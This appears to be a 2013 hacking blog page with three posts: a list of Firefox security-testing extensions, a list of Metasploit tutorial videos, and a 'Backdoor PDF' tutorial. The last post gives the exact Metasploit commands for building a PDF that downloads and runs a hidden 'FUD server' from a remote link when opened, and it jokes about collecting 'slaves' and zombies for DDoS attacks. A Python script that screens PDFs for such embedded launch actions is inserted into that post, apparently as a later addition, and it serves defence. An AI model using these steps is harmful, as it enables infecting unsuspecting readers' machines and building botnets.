
Monday, 4 November 2013

Turning Mozilla Firefox Into A Hacking Machine {And Secure In Some Way}!! ;D #Mozilla #Firefox #Hacking #Infosec #Hackers




The Internet is an amazing virtual world where you can "virtually" do anything: gambling, playing, watching movies, shopping, working, “VoIPying”, spying on other people and, for sure, auditing remote systems.
The security testers’ community has a large panel of security tools, methodologies and much more to perform their pentests and audit assessments. But what happens if you find yourself weaponless?
No more Top 100 security tools, no more LiveCDs and no more exploitation frameworks. A security auditor without a toolbox is like a cop without a gun.
Nevertheless, there may be a way to rescue yourself from this nightmare situation.
The magical solution could be Firefox and its extensions developed by hackers and coders. If you don’t want to do the work below, there is an open-source browser-based security framework called Mantra which comes preconfigured with all of these extensions and many more. You can download it from H3R3. Yeah!!

Here is a list of useful security auditing extensions:

*Information Gathering*

Whois And Geo-location

Ø ShowIP : Shows the IP address of the current page in the status bar. It also allows querying custom services such as whois and netcraft by IP (right mouse button) and hostname (left mouse button).
Ø Shazou : The product called Shazou (pronounced Shazoo; it is Japanese for mapping) enables the user to map and geo-locate, with one click, any website they are currently viewing.
Ø HostIP.info Geolocation : Displays geolocation information for a website using hostip.info data. Works with all versions of Firefox.
Ø Active Whois : Starts Active Whois to get details about any website owner and its host server.
Ø Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It includes WhoIs, DNS Report, Geolocation, Traceroute and Ping. Very useful for the information gathering phase.

  

*Enumeration / Fingerprinting*

Ø Header Spy : Shows HTTP headers on statusbar.
Ø Header Monitor : A Firefox extension that displays, on the status bar panel, any HTTP response header of the top-level document returned by a web server. Examples: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

*Social Engineering*

ØPeople Search and Public Record : This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.

 *Googling And Spidering*

Ø Advanced dork : Gives quick access to Google’s Advanced Operators directly from the context menu. This could be used to spider a site or scan for hidden files (this spider technique is used via scroogle.org)
Ø SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack. Download from H3R3
Ø View Dependencies : View Dependencies adds a tab to the "page info" window, in which it lists all the files which were loaded to show the current page. (useful for a spidering technique)

*Security Assessment / Code auditing*

*Editors*

Ø JSView : The ’view page source’ menu item now opens files based on the behaviour you choose in the jsview options. This allows you to open the source code of any web page in a new tab or in an external editor.
Ø Cert Viewer Plus : Adds two options to the certificate viewer in Firefox or Thunderbird: an X.509 certificate can either be displayed in PEM format (Base64/RFC 1421, opens in a new window) or saved to a file (in PEM or DER format – and PKCS#7 provided that the respective patch has been applied - cf.
Ø Firebug : Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
Ø XML Developer Toolbar : Lets XML developers use standard tools, all from the browser.


*Headers Manipulation*

Ø HeaderMonitor : A Firefox extension that displays, on the status bar panel, any HTTP response header of the top-level document returned by a web server. Examples: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.
Ø RefControl : Control what gets sent as the HTTP Referrer on a per-site basis.
Ø User Agent Switcher : Adds a menu and a toolbar button to switch the user agent of the browser.

*Cookies Manipulation*

Ø Add N Edit Cookies : Cookie editor that allows you to add and edit "session" and saved cookies.
Ø CookieSwap : CookieSwap is an extension that enables you to maintain numerous sets or "profiles" of cookies that you can quickly swap between while browsing.
Ø httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side.
Ø Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file.

 *Security Auditing*

Ø HackBar : This toolbar will help you in testing SQL injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code.
Ø Tamper Data : Use “tamper data” to view and modify HTTP/HTTPS headers and post parameters.
Ø Chickenfoot : Chickenfoot is a Firefox extension that puts a programming environment in the browser’s sidebar so you can write scripts to manipulate web pages and automate web browsing. In Chickenfoot, scripts are written in a superset of JavaScript that includes special functions specific to web tasks.

*Misc*


 *Hacks For Fun*

Ø Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript (scripts can be downloaded here)
Ø Encryption Fire Encrypter : FireEncrypter is a Firefox extension which gives you encryption/decryption and hashing functionalities right from your Firefox browser, mostly useful for developers or for education & fun.

*Malware Scanner*

Ø QArchive.org web files checker : Allowing people to check web files for any malware (viruses, trojans, worms, adware, spyware and other unwanted things) inclusions.
Ø Dr.Web anti-virus link checker : This plugin allows you to check any file you are about to download, any page you are about to visit.
Ø ClamWin Antivirus Glue for Firefox : This extension scans every downloaded file automatically with ClamWin.

*Anti Spoof*

Ø refspoof : Makes it easy to pretend to originate from a site by overriding the URL referrer (in an HTTP request). It incorporates this feature by using the pseudo-protocol spoof:// so it’s possible to store the information in a "hyperlink" that can be used in any context, like HTML pages or bookmarks.

 

Sunday, 3 November 2013

Metasploit Framework Expert #Metasploit #Hacking #Infosec #Vulnerability #Exploit #Overflow #Pentesting


Metasploit is?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

Hacking through Metasploit is done in 3 simple steps: Point, Click, Own.


Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you need to know them).


Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.


Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.


Overflow: An error caused when a program tries to store data beyond the size of the space allocated for it. May be used by an attacker to execute malicious code.

Payload: The actual code which runs on the compromised system after exploitation.

A non-exhaustive list of topics on the tutorial videos includes:


• Metasploit Basics and Framework Organization
• Server and Client Side Exploitation
• Meterpreter - Extensions and Scripting
• Database Integration and Automated Exploitation
• Post Exploitation Kung-Fu - Exploring the system, Privilege escalation, Log deletion and AV / Firewall bypass
• Token stealing and impersonation, Backdoors and Rootkits, Pivoting and Port forwarding, Railgun and Custom Scripting, Backdoor an Executable
• Ruby Primer for Hackers
• Writing Metasploit Modules - Auxiliary and Exploit
• Exploit research with Metasploit - Buffer Overflows, SEH, DEP Bypass, Return Oriented Programming
• Social Engineering Toolkit (SET) and Armitage
• Scenario Based Hacking using Metasploit
 


TUTORIAL VIDEOS ARE ABSOLUTELY FREE.

The advantage of these video tutorials is that they explain Metasploit in detail, and you can learn at your own pace at each step, with no hurry. Click on your desired topic (in brackets):
  1. Metasploit Framework Expert Part 1 (Exploitation Basics)
  2. Metasploit Framework Expert Part 2 (Why Metasploit?)
  3. Metasploit Framework Expert Part 3 (Meterpreter Basics)
  4. Metasploit Framework Expert Part 4 (Framework Organization)
  5. Metasploit Framework Expert Part 5 (Post Exploitation Kung-Fu)
  6. Metasploit Framework Expert Part 6 (Post Exploitation Privilege Escalation)
  7. Metasploit Framework Expert Part 7 (Killing Av And Disabling Firewall)
  8. Metasploit Framework Expert Part 8 (Stdapi And Priv Extensions)
  9. Metasploit Framework Expert Part 9 (Token Stealing And Incognito)
  10. Metasploit Framework Expert Part 10 (Espia And Sniffer Extensions In Post Exploitation)
  11. Metasploit Framework Expert Part 11 (Post Exploitation Backdoors)
  12. Metasploit Framework Expert Part 12 (Pivoting After Post Exploitation)
  13. Metasploit Framework Expert Part 13 (Port Forwarding As Part Of Post Exploitation)
  14. Metasploit Framework Expert Part 14 (Client Side Exploits)
  15. Metasploit Framework Expert Part 15 (Backdoors And Rootkits In Post Exploitation)
  16. Metasploit Framework Expert Part 16 (Exploit Research With Metasploit)
  17. Metasploit Framework Expert Part 17 (Railgun Basics)
  18. Metasploit Framework Expert Part 18 (Railgun Adding Functions)
  19. Metasploit Framework Expert Part 19 (Railgun Adding New Dlls)
  20. Metasploit Framework Expert Part 19A (Railgun Adding New Dlls On Windows 7)
  21. Metasploit Framework Expert Part 20 (Resource Scripts)
  22. Metasploit Framework Expert Part 21 (Database Support)
  23. Metasploit Framework Expert Part 22 (Using Plugins)
  24. Metasploit Framework Expert Part 23 (Meterpreter Api Basics)
  25. Metasploit Framework Expert Part 24 (Meterpreter Scripting Migrate Clone)
  26. Metasploit Framework Expert Part 25 (Meterpreter Scripting Process Name Search)



Wednesday, 30 October 2013

Backdoor PDF #Hacker #Hacking #Exploit #Hacker #Pdf #Backdoor





This tutorial will guide you through how to backdoor a PDF. Basically, it will download your server when someone opens your PDF file. I am not responsible for what you use this guide for *Giggling* {Try not to infect all the PDF files on the Internet, some of us love reading} *Smirking*


Tutorial:


Requirements:

-Metasploit, 
-A PDF eBook 
-And a FUD server. 


Metasploit can be downloaded from HERE


Search the web for free eBooks if you don't have any on your e-library

>>Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropbox, Mediafire, 4shared, 2shared

>>And make sure that you have installed Metasploit correctly!



Now we will infect the PDF file


1. Open up Metasploit console


2. Type this in the console: use exploit/windows/fileformat/adobe_pdf_embedded_exe


3. Type this in the console: set payload windows/download_exec


4. Type this in console: set INFILENAME <location of your pdf to infect here>

EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf


5. Type this in console: set url <direct download link to your fud server>

EXAMPLE: set url http://download.com/server.exe


6. Type this in console: Exploit

Now you have infected your PDF file and you will be ready to send it out, when people open the infected PDF file then it will download your server and *BAM* new slave.

(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)
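
From the defender's side, files built this way can be triaged before anyone opens them. The following is an added example, not part of the original post or of Metasploit: it assumes (the post does not describe the file's internals) that such a PDF carries an embedded-file stream together with a launch or JavaScript action, and it counts those PDF name objects, including ones written with #xx escapes. The sample byte strings are constructed.

```python
import re

# PDF name objects worth a look when triaging mail attachments and downloads.
SUSPICIOUS_NAMES = ("/Launch", "/EmbeddedFile", "/OpenAction", "/AA", "/JavaScript", "/JS")

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# A name is "/" followed by characters up to whitespace or a PDF delimiter.
_NAME = re.compile(rb"/[^\x00\t\n\x0c\r \[\]()<>{}/%]+")


def normalize_name(raw: bytes) -> str:
    """Decode #xx escapes so that /L#61unch is compared as /Launch."""
    decoded = _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return decoded.decode("latin-1")


def count_names(data: bytes) -> dict:
    """Count occurrences of each suspicious name in the raw file bytes."""
    counts = {name: 0 for name in SUSPICIOUS_NAMES}
    for match in _NAME.finditer(data):
        name = normalize_name(match.group(0))
        if name in counts:
            counts[name] += 1
    return counts


def triage(data: bytes) -> str:
    """Return 'not-pdf', 'clean', 'review' or 'quarantine'."""
    if b"%PDF-" not in data[:1024]:
        return "not-pdf"
    c = count_names(data)
    embedded = c["/EmbeddedFile"] > 0
    active = c["/Launch"] + c["/JavaScript"] + c["/JS"] > 0
    trigger = c["/OpenAction"] + c["/AA"] > 0
    if embedded and active:
        return "quarantine"  # an attachment plus something that can run it
    if embedded or active or trigger:
        return "review"
    return "clean"


# Constructed samples: keyword skeletons only, no payload and not valid PDFs.
BENIGN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n%%EOF\n"
SUSPECT = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /Type /Action /S /L#61unch >>\nendobj\n"
    b"4 0 obj\n<< /Type /EmbeddedFile /Length 0 >>\nstream\nendstream\nendobj\n%%EOF\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, triage(sample), count_names(sample))
```

Names stored inside compressed object streams are not visible to this scan, so a "clean" result only covers uncompressed objects.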

-Ok, that's how you get your zombies... they may come in handy when you decide to execute a distributed denial of service attack- *Chuckles* "Yeah I was never here, when you get caught: you're on your own" That phrase simply means I am not responsible for any trouble, complications or holes you fall into during your adventures- *Flips & Slides*